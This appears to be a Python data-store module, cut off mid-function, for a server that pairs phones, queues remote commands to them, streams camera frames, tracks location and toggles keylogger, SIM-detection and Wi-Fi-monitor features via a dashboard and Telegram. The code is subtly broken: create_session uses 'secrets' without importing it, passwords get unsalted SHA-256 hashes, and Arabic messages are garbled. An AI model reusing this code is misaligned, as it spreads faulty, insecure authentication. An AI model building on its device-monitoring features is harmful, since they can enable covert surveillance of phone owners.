     1в†’     1в†’"""
     2в†’     2в†’Data Store Module - Central data management for Abu-Zahra Server.
     3в†’     3в†’Handles all in-memory data, JSON persistence, and user/device management.
     4в†’     4в†’Implements email-based account system with unique User IDs.
     5в†’     5в†’"""
     6в†’     6в†’
     7в†’     7в†’import json
     8в†’     8в†’import os
     9в†’     9в†’import time
    10в†’    10в†’import uuid
    11в†’    11в†’import asyncio
    12в†’    12в†’import hashlib
    13в†’    13в†’from typing import Optional, Any, Dict, List
    14в†’    14в†’from datetime import datetime, timedelta
    15в†’    15в†’
    16в†’    16в†’from .config import (
    17в†’    17в†’    DATA_DIR, PAIRING_CODE_LENGTH, PAIRING_CODE_CHARS,
    18в†’    18в†’    PAIRING_CODE_EXPIRE_SECONDS, MAX_EVENTS, MAX_LINK_CODES,
    19в†’    19в†’    DEVICE_OFFLINE_TIMEOUT, JWT_EXPIRE_HOURS, JWT_SECRET, ADMIN_EMAIL,
    20в†’    20в†’    ADMIN_USERNAME, ADMIN_PASSWORD
    21в†’    21в†’)
    22в†’    22в†’
    23в†’    23в†’# в”Ђв”Ђв”Ђ File Paths в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
    24в†’    24в†’def _path(name: str) -> str:
    25в†’    25в†’    return os.path.join(DATA_DIR, name)
    26в†’    26в†’
    27в†’    27в†’# в”Ђв”Ђв”Ђ JSON File I/O в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
    28в†’    28в†’_json_lock = asyncio.Lock()
    29в†’    29в†’
    30в†’    30в†’async def _load_json(name: str, default=None) -> Any:
    31в†’    31в†’    p = _path(name)
    32в†’    32в†’    if os.path.exists(p):
    33в†’    33в†’        try:
    34в†’    34в†’            with open(p, 'r', encoding='utf-8') as f:
    35в†’    35в†’                return json.load(f)
    36в†’    36в†’        except (json.JSONDecodeError, IOError):
    37в†’    37в†’            return default if default is not None else []
    38в†’    38в†’    return default if default is not None else []
    39в†’    39в†’
    40в†’    40в†’async def _save_json(name: str, data: Any) -> None:
    41в†’    41в†’    async with _json_lock:
    42в†’    42в†’        p = _path(name)
    43в†’    43в†’        with open(p, 'w', encoding='utf-8') as f:
    44в†’    44в†’            json.dump(data, f, ensure_ascii=False, indent=2, default=str)
    45в†’    45в†’
    46в†’    46в†’# в”Ђв”Ђв”Ђ In-Memory Stores в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
    47в†’    47в†’class DataStore:
    48в†’    48в†’    """Central data store for all server data."""
    49в†’    49в†’    
    50в†’    50в†’    def __init__(self):
    51в†’    51в†’        self.start_time = time.time()
    52в†’    52в†’        
    53в†’    53в†’        # Users: {user_id: {id, email, username, password_hash, role, created_at, devices[], settings, is_active}}
    54в†’    54в†’        self.users: Dict[str, dict] = {}
    55в†’    55в†’        
    56в†’    56в†’        # Sessions: {token: {user_id, username, role, created_at, expires_at, ip, user_agent}}
    57в†’    57в†’        self.sessions: Dict[str, dict] = {}
    58в†’    58в†’        
    59в†’    59в†’        # Devices: {device_id: {id, token, name, model, brand, os, battery, network, location, last_seen, created_at, owner_id, ...}}
    60в†’    60в†’        self.devices: Dict[str, dict] = {}
    61в†’    61в†’        
    62в†’    62в†’        # Commands: {command_id: {id, device_id, command, params, status, created_at, sent_at, result, completed_at, requested_by, source}}
    63в†’    63в†’        self.commands: Dict[str, dict] = {}
    64в†’    64в†’        self._command_counter = 0
    65в†’    65в†’        
    66в†’    66в†’        # Events: [{time, event, details, level, device_id, user_id}]
    67в†’    67в†’        self.events: List[dict] = []
    68в†’    68в†’        
    69в†’    69в†’        # Settings (global): {key: value}
    70в†’    70в†’        self.settings: dict = {
    71в†’    71в†’            "sync_interval": 15,
    72в†’    72в†’            "location_interval": 300,
    73в†’    73в†’            "auto_location": False,
    74в†’    74в†’            "auto_sync": True,
    75в†’    75в†’            "language": "ar",
    76в†’    76в†’            "notifications": True,
    77в†’    77в†’            "keylogger": False,
    78в†’    78в†’            "sim_detect": True,
    79в†’    79в†’            "wifi_monitor": False,
    80в†’    80в†’            "geofences": [],
    81в†’    81в†’        }
    82в†’    82в†’        
    83в†’    83в†’        # Pairing Codes: {code: {code, created_at, used, device_id, user_id, session_id, used_at, expires_at}}
    84в†’    84в†’        self.pairing_codes: Dict[str, dict] = {}
    85в†’    85в†’        
    86в†’    86в†’        # File tracking: {file_id: {id, device_id, filename, file_type, size, uploaded_at, expires_at, retrieved, command_id, caption}}
    87в†’    87в†’        self.files: Dict[str, dict] = {}
    88в†’    88в†’        
    89в†’    89в†’        # Rate limiting
    90в†’    90в†’        self._rate_counters: Dict[str, list] = {}
    91в†’    91в†’        self._last_link_code_time: float = 0
    92в†’    92в†’        self._device_last_online: Dict[str, bool] = {}
    93в†’    93в†’        self._device_battery_alert: Dict[str, float] = {}
    94в†’    94в†’        
    95в†’    95в†’        # Streaming
    96в†’    96в†’        self.stream_connections: Dict[str, dict] = {}
    97в†’    97в†’        self.latest_frames: Dict[str, dict] = {}
    98в†’    98в†’        self.jpeg_stream_tasks: Dict[str, asyncio.Task] = {}
    99в†’    99в†’        self.jpeg_stream_info: Dict[str, dict] = {}
   100в†’   100в†’        
   101в†’   101в†’        # Dashboard WebSocket clients
   102в†’   102в†’        self.dashboard_ws_clients: set = set()
   103в†’   103в†’        
   104в†’   104в†’        # Pending messages (for Telegram tracking)
   105в†’   105в†’        self.pending_messages: Dict[str, dict] = {}
   106в†’   106в†’        self.batch_operations: Dict[str, dict] = {}
   107в†’   107в†’        
   108в†’   108в†’        # Dedup sets
   109в†’   109в†’        self._processed_results: set = set()
   110в†’   110в†’        self._tg_processed_updates: set = set()
   111в†’   111в†’        self._tg_processed_messages: set = set()
   112в†’   112в†’        
   113в†’   113в†’        # Telegram per-user sessions: {chat_id: {user_id, authenticated, devices[], selected_device, ...}}
   114в†’   114в†’        self.tg_sessions: Dict[str, dict] = {}
   115в†’   115в†’        
   116в†’   116в†’        # Stats
   117в†’   117в†’        self.api_hits = 0
   118в†’   118в†’        self.messages_sent = 0
   119в†’   119в†’
   120в†’   120в†’    # в”Ђв”Ђв”Ђ Persistence в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   121в†’   121в†’    async def load_all(self):
   122в†’   122в†’        """Load all data from JSON files on startup."""
   123в†’   123в†’        self.devices = {d['id']: d for d in await _load_json("devices.json", [])}
   124в†’   124в†’        self.events = await _load_json("events.json", [])
   125в†’   125в†’        self.settings = await _load_json("settings.json", self.settings)
   126в†’   126в†’        self.pairing_codes = {c['code']: c for c in await _load_json("link_codes.json", [])}
   127в†’   127в†’        self.sessions = {s['token']: s for s in await _load_json("sessions.json", [])}
   128в†’   128в†’        self.users = {u['id']: u for u in await _load_json("users.json", [])}
   129в†’   129в†’        
   130в†’   130в†’        # Ensure admin user exists
   131в†’   131в†’        if not self.users:
   132в†’   132в†’            await self._create_admin_user()
   133в†’   133в†’        
   134в†’   134в†’        # Clean expired sessions
   135в†’   135в†’        await self.cleanup_expired_sessions()
   136в†’   136в†’        
   137в†’   137в†’        # Clean expired pairing codes
   138в†’   138в†’        await self.cleanup_expired_pairing_codes()
   139в†’   139в†’        
   140в†’   140в†’        # Initialize device online states
   141в†’   141в†’        for did, dev in self.devices.items():
   142в†’   142в†’            last = dev.get('last_seen', 0)
   143в†’   143в†’            online = (time.time() - last) < DEVICE_OFFLINE_TIMEOUT if last else False
   144в†’   144в†’            self._device_last_online[did] = online
   145в†’   145в†’
   146в†’   146в†’    async def save_all(self):
   147в†’   147в†’        """Save all data to JSON files."""
   148в†’   148в†’        await asyncio.gather(
   149в†’   149в†’            _save_json("devices.json", list(self.devices.values())),
   150в†’   150в†’            _save_json("events.json", self.events[-MAX_EVENTS:]),
   151в†’   151в†’            _save_json("settings.json", self.settings),
   152в†’   152в†’            _save_json("link_codes.json", list(self.pairing_codes.values())[-MAX_LINK_CODES:]),
   153в†’   153в†’            _save_json("sessions.json", list(self.sessions.values())),
   154в†’   154в†’            _save_json("users.json", list(self.users.values())),
   155в†’   155в†’        )
   156в†’   156в†’
   157в†’   157в†’    async def save_devices(self):
   158в†’   158в†’        await _save_json("devices.json", list(self.devices.values()))
   159в†’   159в†’
   160в†’   160в†’    async def save_events(self):
   161в†’   161в†’        await _save_json("events.json", self.events[-MAX_EVENTS:])
   162в†’   162в†’
   163в†’   163в†’    async def save_users(self):
   164в†’   164в†’        await _save_json("users.json", list(self.users.values()))
   165в†’   165в†’
   166в†’   166в†’    async def save_sessions(self):
   167в†’   167в†’        await _save_json("sessions.json", list(self.sessions.values()))
   168в†’   168в†’
   169в†’   169в†’    # в”Ђв”Ђв”Ђ User Management (Email-based) в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   170в†’   170в†’    
   171в†’   171в†’    @staticmethod
   172в†’   172в†’    def _hash_password(password: str) -> str:
   173в†’   173в†’        return hashlib.sha256(password.encode()).hexdigest()
   174в†’   174в†’    
   175в†’   175в†’    @staticmethod
   176в†’   176в†’    def generate_user_id() -> str:
   177в†’   177в†’        return f"USR-{uuid.uuid4().hex[:12].upper()}"
   178в†’   178в†’    
   179в†’   179в†’    async def _create_admin_user(self):
   180в†’   180в†’        """Create default admin user on first run."""
   181в†’   181в†’        user_id = self.generate_user_id()
   182в†’   182в†’        self.users[user_id] = {
   183в†’   183в†’            "id": user_id,
   184в†’   184в†’            "email": ADMIN_EMAIL,
   185в†’   185в†’            "username": ADMIN_USERNAME,
   186в†’   186в†’            "password_hash": self._hash_password(ADMIN_PASSWORD),
   187в†’   187в†’            "role": "admin",
   188в†’   188в†’            "created_at": datetime.utcnow().isoformat(),
   189в†’   189в†’            "is_active": True,
   190в†’   190в†’            "devices": [],
   191в†’   191в†’            "settings": {},
   192в†’   192в†’        }
   193в†’   193в†’        await self.save_users()
   194в†’   194в†’        await self.add_event("system", "Admin user created", "info")
   195в†’   195в†’
   196в†’   196в†’    async def create_user(self, email: str, username: str, password: str, role: str = "user") -> dict:
   197в†’   197в†’        """Create a new user account. Returns user dict or raises ValueError."""
   198в†’   198в†’        email = email.lower().strip()
   199в†’   199в†’        
   200в†’   200в†’        # Check uniqueness
   201в†’   201в†’        for u in self.users.values():
   202в†’   202в†’            if u['email'] == email:
   203в†’   203в†’                raise ValueError("Ш§Щ„ШЁШ±ЩЉШЇ Ш§Щ„ШҐЩ„ЩѓШЄШ±Щ€Щ†ЩЉ Щ…ШіШ¬Щ„ Щ…ШіШЁЩ‚Ш§Щ‹")
   204в†’   204в†’            if u['username'] == username:
   205в†’   205в†’                raise ValueError("Ш§ШіЩ… Ш§Щ„Щ…ШіШЄШ®ШЇЩ… Щ…ШіШ¬Щ„ Щ…ШіШЁЩ‚Ш§Щ‹")
   206в†’   206в†’        
   207в†’   207в†’        user_id = self.generate_user_id()
   208в†’   208в†’        user = {
   209в†’   209в†’            "id": user_id,
   210в†’   210в†’            "email": email,
   211в†’   211в†’            "username": username,
   212в†’   212в†’            "password_hash": self._hash_password(password),
   213в†’   213в†’            "role": role,
   214в†’   214в†’            "created_at": datetime.utcnow().isoformat(),
   215в†’   215в†’            "is_active": True,
   216в†’   216в†’            "devices": [],
   217в†’   217в†’            "settings": {},
   218в†’   218в†’        }
   219в†’   219в†’        self.users[user_id] = user
   220в†’   220в†’        await self.save_users()
   221в†’   221в†’        await self.add_event("system", f"User created: {username} ({email})", "success")
   222в†’   222в†’        return user
   223в†’   223в†’
   224в†’   224в†’    async def authenticate_user(self, username_or_email: str, password: str) -> Optional[dict]:
   225в†’   225в†’        """Authenticate user by username or email + password. Returns user dict or None."""
   226в†’   226в†’        username_or_email = username_or_email.strip().lower()
   227в†’   227в†’        password_hash = self._hash_password(password)
   228в†’   228в†’        
   229в†’   229в†’        for u in self.users.values():
   230в†’   230в†’            if (u['email'] == username_or_email or u['username'].lower() == username_or_email) and u['password_hash'] == password_hash:
   231в†’   231в†’                if not u.get('is_active', True):
   232в†’   232в†’                    return None
   233в†’   233в†’                return u
   234в†’   234в†’        return None
   235в†’   235в†’
   236в†’   236в†’    async def get_user(self, user_id: str) -> Optional[dict]:
   237в†’   237в†’        return self.users.get(user_id)
   238в†’   238в†’
   239в†’   239в†’    async def get_user_devices(self, user_id: str) -> List[dict]:
   240в†’   240в†’        """Get all devices owned by a user. Admin sees all."""
   241в†’   241в†’        user = self.users.get(user_id)
   242в†’   242в†’        if not user:
   243в†’   243в†’            return []
   244в†’   244в†’        if user.get('role') == 'admin':
   245в†’   245в†’            return list(self.devices.values())
   246в†’   246в†’        return [d for d in self.devices.values() if d.get('owner_id') == user_id]
   247в†’   247в†’
   248в†’   248в†’    async def update_user(self, user_id: str, updates: dict) -> bool:
   249в†’   249в†’        user = self.users.get(user_id)
   250в†’   250в†’        if not user:
   251в†’   251в†’            return False
   252в†’   252в†’        for k, v in updates.items():
   253в†’   253в†’            if k == 'password':
   254в†’   254в†’                user['password_hash'] = self._hash_password(v)
   255в†’   255в†’            elif k in ('email', 'username', 'role', 'is_active', 'settings'):
   256в†’   256в†’                user[k] = v
   257в†’   257в†’        await self.save_users()
   258в†’   258в†’        return True
   259в†’   259в†’
   260в†’   260в†’    async def delete_user(self, user_id: str) -> bool:
   261в†’   261в†’        if user_id not in self.users:
   262в†’   262в†’            return False
   263в†’   263в†’        del self.users[user_id]
   264в†’   264в†’        await self.save_users()
   265в†’   265в†’        return True
   266в†’   266в†’
   267в†’   267в†’    async def list_users(self) -> List[dict]:
   268в†’   268в†’        return list(self.users.values())
   269в†’   269в†’
   270в†’   270в†’    # в”Ђв”Ђв”Ђ Session Management в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   271в†’   271в†’    
   272в†’   272в†’    def create_session(self, user_id: str, username: str, role: str, ip: str = "", user_agent: str = "", source: str = "web") -> dict:
   273в†’   273в†’        token = secrets.token_hex(32)
   274в†’   274в†’        now = datetime.utcnow()
   275в†’   275в†’        session = {
   276в†’   276в†’            "token": token,
   277в†’   277в†’            "user_id": user_id,
   278в†’   278в†’            "username": username,
   279в†’   279в†’            "role": role,
   280в†’   280в†’            "created_at": now.isoformat(),
   281в†’   281в†’            "expires_at": (now + timedelta(hours=JWT_EXPIRE_HOURS)).isoformat(),
   282в†’   282в†’            "ip": ip,
   283в†’   283в†’            "user_agent": user_agent,
   284в†’   284в†’            "source": source,
   285в†’   285в†’        }
   286в†’   286в†’        self.sessions[token] = session
   287в†’   287в†’        return session
   288в†’   288в†’
   289в†’   289в†’    def validate_session(self, token: str) -> Optional[dict]:
   290в†’   290в†’        session = self.sessions.get(token)
   291в†’   291в†’        if not session:
   292в†’   292в†’            return None
   293в†’   293в†’        try:
   294в†’   294в†’            expires = datetime.fromisoformat(session['expires_at'])
   295в†’   295в†’            # Ensure naive comparison (strip tz if present)
   296в†’   296в†’            if expires.tzinfo is not None:
   297в†’   297в†’                from datetime import timezone
   298в†’   298в†’                expires = expires.replace(tzinfo=None)
   299в†’   299в†’            if datetime.utcnow() > expires:
   300в†’   300в†’                del self.sessions[token]
   301в†’   301в†’                return None
   302в†’   302в†’        except (ValueError, KeyError):
   303в†’   303в†’            return None
   304в†’   304в†’        return session
   305в†’   305в†’
   306в†’   306в†’    async def cleanup_expired_sessions(self):
   307в†’   307в†’        now = datetime.utcnow()
   308в†’   308в†’        to_remove = []
   309в†’   309в†’        for token, s in self.sessions.items():
   310в†’   310в†’            try:
   311в†’   311в†’                expires = datetime.fromisoformat(s['expires_at'])
   312в†’   312в†’                if expires.tzinfo is not None:
   313в†’   313в†’                    expires = expires.replace(tzinfo=None)
   314в†’   314в†’                if expires < now:
   315в†’   315в†’                    to_remove.append(token)
   316в†’   316в†’            except (ValueError, KeyError):
   317в†’   317в†’                to_remove.append(token)
   318в†’   318в†’        for t in to_remove:
   319в†’   319в†’            del self.sessions[t]
   320в†’   320в†’        if to_remove:
   321в†’   321в†’            await self.save_sessions()
   322в†’   322в†’
   323в†’   323в†’    # в”Ђв”Ђв”Ђ Device Management в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   324в†’   324в†’    
   325в†’   325в†’    async def register_device(self, device_id: str, token: str, pairing_code: str,
   326в†’   326в†’                               model: str = "", brand: str = "", os_version: str = "",
   327в†’   327в†’                               user_id: str = None) -> Optional[dict]:
   328в†’   328в†’        """Register a device using a pairing code. Assigns to user who created the code."""
   329в†’   329в†’        code_data = self.pairing_codes.get(pairing_code)
   330в†’   330в†’        if not code_data:
   331в†’   331в†’            return None
   332в†’   332в†’        if code_data.get('used'):
   333в†’   333в†’            return None
   334в†’   334в†’        try:
   335в†’   335в†’            expires = datetime.fromisoformat(code_data['expires_at'])
   336в†’   336в†’            if datetime.utcnow() > expires:
   337в†’   337в†’                return None
   338в†’   338в†’        except (ValueError, KeyError):
   339в†’   339в†’            return None
   340в†’   340в†’        
   341в†’   341в†’        # Mark code as used
   342в†’   342в†’        code_data['used'] = True
   343в†’   343в†’        code_data['used_at'] = datetime.utcnow().isoformat()
   344в†’   344в†’        code_data['device_id'] = device_id
   345в†’   345в†’        
   346в†’   346в†’        # Determine owner
   347в†’   347в†’        owner_id = code_data.get('user_id') or user_id
   348в†’   348в†’        if not owner_id:
   349в†’   349в†’            # Assign to admin
   350в†’   350в†’            for u in self.users.values():
   351в†’   351в†’                if u.get('role') == 'admin':
   352в†’   352в†’                    owner_id = u['id']
   353в†’   353в†’                    break
   354в†’   354в†’        
   355в†’   355в†’        now = datetime.utcnow().isoformat()
   356в†’   356в†’        device = {
   357в†’   357в†’            "id": device_id,
   358в†’   358в†’            "token": token,
   359в†’   359в†’            "active": True,
   360в†’   360в†’            "name": model or "Unknown Device",
   361в†’   361в†’            "model": model,
   362в†’   362в†’            "brand": brand,
   363в†’   363в†’            "os": os_version,
   364в†’   364в†’            "battery": None,
   365в†’   365в†’            "network": None,
   366в†’   366в†’            "location": None,
   367в†’   367в†’            "last_seen": now,
   368в†’   368в†’            "created_at": now,
   369в†’   369в†’            "owner_id": owner_id,
   370в†’   370в†’            "ip": "",
   371в†’   371в†’            "settings": {},
   372в†’   372в†’        }
   373в†’   373в†’        self.devices[device_id] = device
   374в†’   374в†’        self._device_last_online[device_id] = True
   375в†’   375в†’        
   376в†’   376в†’        # Add to user's device list
   377в†’   377в†’        user = self.users.get(owner_id)
   378в†’   378в†’        if user and device_id not in user.get('devices', []):
   379в†’   379в†’            user.setdefault('devices', []).append(device_id)
   380в†’   380в†’        
   381в†’   381в†’        await self.save_devices()
   382в†’   382в†’        await self.save_users()
   383в†’   383в†’        await self.add_event("device", f"Device registered: {model} ({device_id})", "success", device_id=device_id)
   384в†’   384в†’        return device
   385в†’   385в†’
   386в†’   386в†’    async def get_device(self, device_id: str) -> Optional[dict]:
   387в†’   387в†’        return self.devices.get(device_id)
   388в†’   388в†’
   389в†’   389в†’    async def get_user_device(self, user_id: str, device_id: str) -> Optional[dict]:
   390в†’   390в†’        device = self.devices.get(device_id)
   391в†’   391в†’        if not device:
   392в†’   392в†’            return None
   393в†’   393в†’        user = self.users.get(user_id)
   394в†’   394в†’        if not user:
   395в†’   395в†’            return None
   396в†’   396в†’        if user.get('role') == 'admin' or device.get('owner_id') == user_id:
   397в†’   397в†’            return device
   398в†’   398в†’        return None
   399в†’   399в†’
   400в†’   400в†’    async def update_device(self, device_id: str, updates: dict) -> bool:
   401в†’   401в†’        device = self.devices.get(device_id)
   402в†’   402в†’        if not device:
   403в†’   403в†’            return False
   404в†’   404в†’        device.update(updates)
   405в†’   405в†’        await self.save_devices()
   406в†’   406в†’        return True
   407в†’   407в†’
   408в†’   408в†’    async def unlink_device(self, device_id: str, user_id: str) -> bool:
   409в†’   409в†’        device = self.devices.get(device_id)
   410в†’   410в†’        if not device:
   411в†’   411в†’            return False
   412в†’   412в†’        user = self.users.get(user_id)
   413в†’   413в†’        if not user or (user.get('role') != 'admin' and device.get('owner_id') != user_id):
   414в†’   414в†’            return False
   415в†’   415в†’        device['active'] = False
   416в†’   416в†’        # Remove from user's device list
   417в†’   417в†’        if device_id in user.get('devices', []):
   418в†’   418в†’            user['devices'].remove(device_id)
   419в†’   419в†’        await self.save_devices()
   420в†’   420в†’        await self.save_users()
   421в†’   421в†’        await self.add_event("device", f"Device unlinked: {device_id}", "warning", device_id=device_id)
   422в†’   422в†’        return True
   423в†’   423в†’
   424в†’   424в†’    def get_device_token(self, device_id: str) -> Optional[str]:
   425в†’   425в†’        device = self.devices.get(device_id)
   426в†’   426в†’        return device['token'] if device else None
   427в†’   427в†’
   428в†’   428в†’    def validate_device_token(self, device_id: str, token: str) -> bool:
   429в†’   429в†’        device = self.devices.get(device_id)
   430в†’   430в†’        return device is not None and device.get('token') == token and device.get('active', True)
   431в†’   431в†’
   432в†’   432в†’    # в”Ђв”Ђв”Ђ Pairing Code Management в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   433в†’   433в†’    
   434в†’   434в†’    def generate_pairing_code(self, user_id: str) -> dict:
   435в†’   435в†’        import secrets as sec
   436в†’   436в†’        code = ''.join(sec.choice(PAIRING_CODE_CHARS) for _ in range(PAIRING_CODE_LENGTH))
   437в†’   437в†’        now = datetime.utcnow()
   438в†’   438в†’        code_data = {
   439в†’   439в†’            "code": code,
   440в†’   440в†’            "created_at": now.isoformat(),
   441в†’   441в†’            "expires_at": (now + timedelta(seconds=PAIRING_CODE_EXPIRE_SECONDS)).isoformat(),
   442в†’   442в†’            "used": False,
   443в†’   443в†’            "device_id": None,
   444в†’   444в†’            "user_id": user_id,
   445в†’   445в†’            "session_id": str(uuid.uuid4()),
   446в†’   446в†’            "used_at": None,
   447в†’   447в†’        }
   448в†’   448в†’        self.pairing_codes[code] = code_data
   449в†’   449в†’        return code_data
   450в†’   450в†’
   451в†’   451в†’    async def verify_pairing_code(self, code: str) -> Optional[dict]:
   452в†’   452в†’        code_data = self.pairing_codes.get(code)
   453в†’   453в†’        if not code_data:
   454в†’   454в†’            return None
   455в†’   455в†’        if code_data.get('used'):
   456в†’   456в†’            return None
   457в†’   457в†’        try:
   458в†’   458в†’            expires = datetime.fromisoformat(code_data['expires_at'])
   459в†’   459в†’            if datetime.utcnow() > expires:
   460в†’   460в†’                return None
   461в†’   461в†’        except (ValueError, KeyError):
   462в†’   462в†’            return None
   463в†’   463в†’        return code_data
   464в†’   464в†’
   465в†’   465в†’    async def cleanup_expired_pairing_codes(self):
   466в†’   466в†’        now = datetime.utcnow()
   467в†’   467в†’        to_remove = []
   468в†’   468в†’        for code, c in self.pairing_codes.items():
   469в†’   469в†’            if c.get('used'):
   470в†’   470в†’                continue
   471в†’   471в†’            try:
   472в†’   472в†’                expires = datetime.fromisoformat(c['expires_at'])
   473в†’   473в†’                if expires.tzinfo is not None:
   474в†’   474в†’                    expires = expires.replace(tzinfo=None)
   475в†’   475в†’                if expires < now:
   476в†’   476в†’                    to_remove.append(code)
   477в†’   477в†’            except (ValueError, KeyError):
   478в†’   478в†’                to_remove.append(code)
   479в†’   479в†’        for c in to_remove:
   480в†’   480в†’            del self.pairing_codes[c]
   481в†’   481в†’        if to_remove:
   482в†’   482в†’            await _save_json("link_codes.json", list(self.pairing_codes.values())[-MAX_LINK_CODES:])
   483в†’   483в†’
   484в†’   484в†’    # в”Ђв”Ђв”Ђ Command Management в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   485в†’   485в†’    
   486в†’   486в†’    async def queue_command(self, device_id: str, command: str, params: dict = None,
   487в†’   487в†’                            requested_by: str = "", source: str = "web") -> dict:
   488в†’   488в†’        self._command_counter += 1
   489в†’   489в†’        cmd_id = f"cmd_{int(time.time()*1000)}_{self._command_counter}"
   490в†’   490в†’        now = datetime.utcnow().isoformat()
   491в†’   491в†’        cmd = {
   492в†’   492в†’            "id": cmd_id,
   493в†’   493в†’            "device_id": device_id,
   494в†’   494в†’            "command": command,
   495в†’   495в†’            "params": params or {},
   496в†’   496в†’            "status": "pending",
   497в†’   497в†’            "created_at": now,
   498в†’   498в†’            "sent_at": None,
   499в†’   499в†’            "result": None,
   500в†’   500в†’            "completed_at": None,
   501в†’   501в†’            "requested_by": requested_by,
   502в†’   502в†’            "source": source,
   503в†’   503в†’        }
   504в†’   504в†’        self.commands[cmd_id] = cmd
   505в†’   505в†’        # Also save pending commands to file for device polling
   506в†’   506в†’        await self._save_pending_commands(device_id)
   507в†’   507в†’        return cmd
   508в†’   508в†’
   509в†’   509в†’    async def get_pending_commands(self, device_id: str) -> List[dict]:
   510в†’   510в†’        pending = [cmd for cmd in self.commands.values()
   511в†’   511в†’                   if cmd['device_id'] == device_id and cmd['status'] == 'pending']
   512в†’   512в†’        return pending
   513в†’   513в†’
   514в†’   514в†’    async def update_command_result(self, command_id: str, status: str, result: Any = None) -> bool:
   515в†’   515в†’        cmd = self.commands.get(command_id)
   516в†’   516в†’        if not cmd:
   517в†’   517в†’            return False
   518в†’   518в†’        cmd['status'] = status
   519в†’   519в†’        cmd['result'] = result
   520в†’   520в†’        cmd['completed_at'] = datetime.utcnow().isoformat()
   521в†’   521в†’        return True
   522в†’   522в†’
   523в†’   523в†’    async def _save_pending_commands(self, device_id: str):
   524в†’   524в†’        pending = [cmd for cmd in self.commands.values()
   525в†’   525в†’                   if cmd['device_id'] == device_id and cmd['status'] == 'pending']
   526в†’   526в†’        safe_id = "".join(c for c in device_id if c.isalnum() or c in '-_')
   527в†’   527в†’        await _save_json(f"pending_{safe_id}.json", pending)
   528в†’   528в†’
   529в†’   529в†’    async def get_commands_history(self, device_id: str = None, limit: int = 100) -> List[dict]:
   530в†’   530в†’        cmds = list(self.commands.values())
   531в†’   531в†’        if device_id:
   532в†’   532в†’            cmds = [c for c in cmds if c['device_id'] == device_id]
   533в†’   533в†’        cmds.sort(key=lambda x: x.get('created_at', ''), reverse=True)
   534в†’   534в†’        return cmds[:limit]
   535в†’   535в†’
   536в†’   536в†’    # в”Ђв”Ђв”Ђ Event Management в”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђв”Ђ
   537в†’   537в†’    
   538в†’   538в†’    async def add_event(self, category: str, event: str, level: str = "info",
   539в†’   539в†’                        device_id: str = None, user_id: str = None, details: str = ""):
   540в†’   540в†’        evt = {
   541в†’   541в†’            "time": datetime.utcnow().isoformat(),
   542в†’   542в†’            "event": event,
   543в†’   543в†’            "category": category,
   544в†’   544в†’            "level": level,
   545в†’   545в†’            "device_id": device_id or "",
   546в†’   546в†’            "user_id": user_id or "",
   547в†’   547в†’            "details": details,
   548в†’   548в†’        }
   549в†’   549в†’        self.events.append(evt)
   550в†’   550в†’        if len(self.events) > MAX_EVENTS * 1.5:
   551в†’   551в†’            self.events = self.events[-MAX_EVENTS:]
   552в†’   552в†’        # Don't save on every event (performance); periodic save handles it
   553в†’   553в†’        if len(self.events) % 10 == 0:
